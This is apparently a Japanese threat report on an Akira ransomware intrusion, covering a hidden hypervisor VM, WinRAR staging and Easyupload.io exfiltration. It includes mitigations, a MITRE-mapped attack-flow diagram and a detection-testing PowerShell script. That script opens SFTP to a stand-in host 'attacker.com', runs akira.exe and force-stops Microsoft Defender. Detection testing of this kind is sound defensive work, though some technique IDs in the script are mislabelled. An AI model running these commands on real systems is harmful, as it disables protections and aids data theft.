フォローする 
概要
Akiraランサムウェアのアフィリエイトがハイパーバイザへの不正アクセスを取得し、新しい仮想マシンを作成して隠密な準備環境として使用しました。攻撃者はこの隔離されたVMを活用し、セキュリティ監視を避け、WinRARでデータを準備し、Easyupload.ioのファイル共有プラットフォームを通じてアーカイブを流出させました。このケースは、脅威アクターがデータ窃盗のために正当なアップロードサービスを引き続き悪用していることを示しています。
調査
調査には、EDRテレメトリ、Windowsイベントログ、Microsoft Edgeの閲覧履歴を組み合わせて侵入を再現しました。アナリストはまた、不正な仮想マシンのVHDXイメージを復元し、攻撃者がMicrosoft Defenderを無効にし、Akiraランサムウェアのオペレーションを設定したことを明らかにしました。VMの法医学的レビューにより、準備段階と流出段階で使用された正確なツール、ウェブサイト、ワークフローが露見しました。
緩和策
組織は環境全体で新規または不正なエンドポイントおよび仮想マシンインスタンスの出現を監視するべきです。ハイパーバイザーやドメインコントローラーなどの重要なシステムへのリモートアクセスには強力な可視性が不可欠です。データ流出に使用される可能性のある既知のファイル共有および迅速なアップロードサービスへのアクセスを制限または徹底的に監視することも重要です。
対応策
ハイパーバイザへの不正アクセスが確認された場合、直ちに該当するハイパーバイザおよび新たに作成された仮想マシンを隔離します。VMディスクイメージの法医学分析を行い、データ準備および流出の範囲を特定します。アクセスログを確認して、初期の侵入点を追跡し、持続的な攻撃者のアクセスが残っていないことを確認します。
graph TB %% クラス定義 classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% 初期アクセス段階 action_access[“<b>アクション</b> – <b>T1563.002 および T1021</b><br/>リモートサービスおよびセッションハイジャックを利用した<br/>不正アクセス。対象:<br/>ドメインコントローラーおよびハイパーバイザー。”] class action_access action %% 偵察段階 action_recon_ad[“<b>アクション</b> – <b>T1087 および T1681</b><br/>Active Directory のユーザーおよび<br/>コンピューターを列挙することによる偵察。”] class action_recon_ad action action_recon_soft[“<b>アクション</b> – <b>T1592.002</b><br/>ホスト上のソフトウェアに関する<br/>情報の収集。”] class action_recon_soft action %% 防御回避およびステージング action_hide_artifact[“<b>アクション</b> – <b>T1564.006</b><br/>ハイパーバイザー上で新しい仮想インスタンスを実行し、<br/>セキュリティエージェントを回避するための<br/>アーティファクト隠蔽。”] class action_hide_artifact action action_disable_defender[“<b>アクション</b> – <b>T1685</b><br/>新しい仮想マシン上で Microsoft Defender を無効化し、<br/>防御機能を低下させる。”] class action_disable_defender defense %% 横展開およびデータ収集 action_lateral_move[“<b>アクション</b> – <b>T1080</b><br/>組織のファイルサーバーへの<br/>横展開。”] class action_lateral_move action tool_winrar[“<b>ツール</b> – <b>名称</b>: WinRAR<br/><b>説明</b>: 共有フォルダー内の<br/>機密ファイルをアーカイブするために使用。”] class tool_winrar tool action_collect_data[“<b>アクション</b> – <b>T1560</b><br/>機密ファイルをアーカイブすることによる<br/>データ収集。”] class action_collect_data action %% 流出段階 action_stage_data[“<b>アクション</b> – <b>T1074.002</b><br/>流出前にアーカイブデータを<br/>一時保存するデータステージング。”] class action_stage_data action action_move_tools[“<b>アクション</b> – <b>T1570</b><br/>攻撃ツールを環境内へ移動するための<br/>インバウンドツール転送。”] class action_move_tools action tool_winscp[“<b>ツール</b> – <b>名称</b>: WinSCP<br/><b>説明</b>: データ転送に使用。”] class tool_winscp tool tool_easyupload[“<b>ツール</b> – <b>名称</b>: Easyupload.io / LimeWire<br/><b>説明</b>: 流出に使用される<br/>Webベースのファイル転送サービス。”] class tool_easyupload tool action_exfiltrate[“<b>アクション</b> – <b>T1071.002 および T1105</b><br/>Webサービスおよびファイル転送プロトコルを介した<br/>データ流出。”] class action_exfiltrate action %% 影響段階 malware_akira[“<b>マルウェア</b> – <b>名称</b>: Akira ransomware<br/><b>ファイル</b>: akira.exe<br/><b>説明</b>: マウントされたネットワーク共有上の<br/>ファイルを暗号化。”] class malware_akira malware action_impact[“<b>アクション</b> – <b>T1486</b><br/>データ暗号化による影響。”] class action_impact action %% 接続フロー action_access –>|つながる| action_recon_ad action_access –>|つながる| action_recon_soft action_recon_ad –>|つながる| action_hide_artifact action_recon_soft –>|つながる| action_hide_artifact action_hide_artifact –>|つながる| action_disable_defender action_disable_defender –>|つながる| action_lateral_move action_lateral_move –>|つながる| action_collect_data action_collect_data –>|使用| tool_winrar action_collect_data –>|つながる| action_stage_data action_stage_data –>|つながる| action_move_tools action_move_tools –>|つながる| action_exfiltrate action_exfiltrate –>|使用| tool_winscp action_exfiltrate –>|使用| tool_easyupload action_exfiltrate –>|つながる| malware_akira malware_akira –>|結果| action_impact
攻撃フロー
シミュレーション実行
前提条件:テレメトリとベースラインの事前チェックが通過している必要があります。
根拠:このセクションでは、検出ルールをトリガーするための敵対者技術(TTP)の正確な実行を詳述します。コマンドとナラティブは、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。抽象的または無関係な例を用いると誤診を招く可能性があります。
-
攻撃のナラティブ&コマンド: 敵対者は初期アクセスを取得し、影響を拡大しようとしています。まず、
AdUsers.txtのような既知のテキストファイルをチェックして感度の高いファイルを列挙します。流出の準備のため、WinRAR.exeを使用してデータを圧縮します。そしてエクスフィルトレーションツールWinSCP.exeを準備し、最終的にakira.exeランサムウェアペイロードを実行します。EDR/アンチウイルスがプロセスを中断するのを防ぐために、Windefendサービスを停止しようとします。この特定のコマンドライン引数のシーケンスとサービスステータスの変更は、Akira特有の検出ロジックをトリガーすることを意図しています。 -
リグレッションテストスクリプト:
# Akiraランサムウェア検出検証用シミュレーションスクリプト #注:このスクリプトを実行するには管理者権限が必要です。 Write-Host "[+] Akiraランサムウェアシミュレーション開始..." -ForegroundColor Cyan # 1. 発見/列挙のシミュレーション (T1119) Write-Host "[+] ステップ1:Notepadを介したファイル列挙のシミュレーション..." Start-Process notepad.exe -ArgumentList "AdUsers.txt" Start-Sleep -Seconds 2 # 2. データアーカイブのシミュレーション (T1560.003) # メモ: WinRARが存在すると仮定するか、コマンドラインの活動をシミュレーションします Write-Host "[+] ステップ2:WinRARを使用したデータアーカイブのシミュレーション..." Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt" Start-Sleep -Seconds 2 # 3. エクスフィルトツール準備のシミュレーション (T1105) Write-Host "[+] ステップ3:エクスフィルトツール実行のシミュレーション..." Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com" Start-Sleep -Seconds 2 # 4. ランサムウェア実行のシミュレーション (T1204.002) Write-Host "[+] ステップ4:Akiraペイロード実行のシミュレーション..." Start-Process "akira.exe" Start-Sleep -Seconds 2 # 5. Defender無効化のシミュレーション (T1564.006) # これによりシステムログのEventID 7036がトリガーされます Write-Host "[+] ステップ5:Microsoft Defenderの停止を試みています..." Stop-Service -Name "Windefend" -Force Write-Host "[+] シミュレーション完了。SIEMで警告を確認してください。" -ForegroundColor Green -
クリーンアップコマンド:
# クリーンアップスクリプト Write-Host "[+] シミュレーションアーティファクトのクリーンアップ..." -ForegroundColor Cyan # Defenderサービスの再起動 Start-Service -Name "Windefend" # シミュレーションされたファイルの削除 Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue Write-Host "[+] クリーンアップ完了。" -ForegroundColor Green